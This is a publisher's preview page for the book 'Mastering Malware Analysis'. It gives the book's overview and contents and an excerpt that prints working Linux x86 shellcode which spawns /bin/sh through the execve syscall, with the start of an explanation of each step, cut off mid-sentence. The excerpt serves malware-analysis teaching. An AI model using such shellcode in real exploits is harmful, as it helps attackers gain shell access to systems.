Book Image

Mastering Malware Analysis

By : Alexey Kleymenov, Amr Thabet
Book Image

Mastering Malware Analysis

By: Alexey Kleymenov, Amr Thabet

Overview of this book

With the ever-growing proliferation of technology, the risk of encountering malicious code or malware has also increased. Malware analysis has become one of the most trending topics in businesses in recent years due to multiple prominent ransomware attacks. Mastering Malware Analysis explains the universal patterns behind different malicious software types and how to analyze them using a variety of approaches. You will learn how to examine malware code and determine the damage it can possibly cause to your systems to ensure that it won't propagate any further. Moving forward, you will cover all aspects of malware analysis for the Windows platform in detail. Next, you will get to grips with obfuscation and anti-disassembly, anti-debugging, as well as anti-virtual machine techniques. This book will help you deal with modern cross-platform malware. Throughout the course of this book, you will explore real-world examples of static and dynamic malware analysis, unpacking and decrypting, and rootkit detection. Finally, this book will help you strengthen your defenses and prevent malware breaches for IoT devices and mobile platforms. By the end of this book, you will have learned to effectively analyze, investigate, and build innovative solutions to handle any malware incidents.
Table of Contents (18 chapters)
Free Chapter
1
Section 1: Fundamental Theory
3
Section 2: Diving Deep into Windows Malware
5
Unpacking, Decryption, and Deobfuscation
9
Section 3: Examining Cross-Platform Malware
13
Section 4: Looking into IoT and Other Platforms

Local shell shellcode

In this section, we will take a look at different examples of shellcode in Linux. We will start with a simple example that spawns a shell:

  jmp _end
_start:
xor ecx,ecx
xor eax,eax
pop ebx ; Load /bin/sh in ebx
mov al, 11 ; execve syscall ID
xor ecx,ecx ; no arguments in ecx
int 0x80 ; syscall

mov al, 1 ; exit syscall ID
xor ebx,ebx ; no errors
int 0x80 ; syscall
_end:
call _start
db '/bin/sh',0

Let's take a closer look at this code:

  • At first, it executes the execve system call to launch a process, which in this case will be /bin/sh. This represents the shell. The execve system call's prototype looks like this:
int execve(const char *filename, char *const argv[], char *const envp[]);
  • It sets the filename in ebx with /bin/sh by using the call/pop instructions to get the absolute address.
  • No additional command line arguments need to be specified in this case, so ecx is set to zero (xor ecx...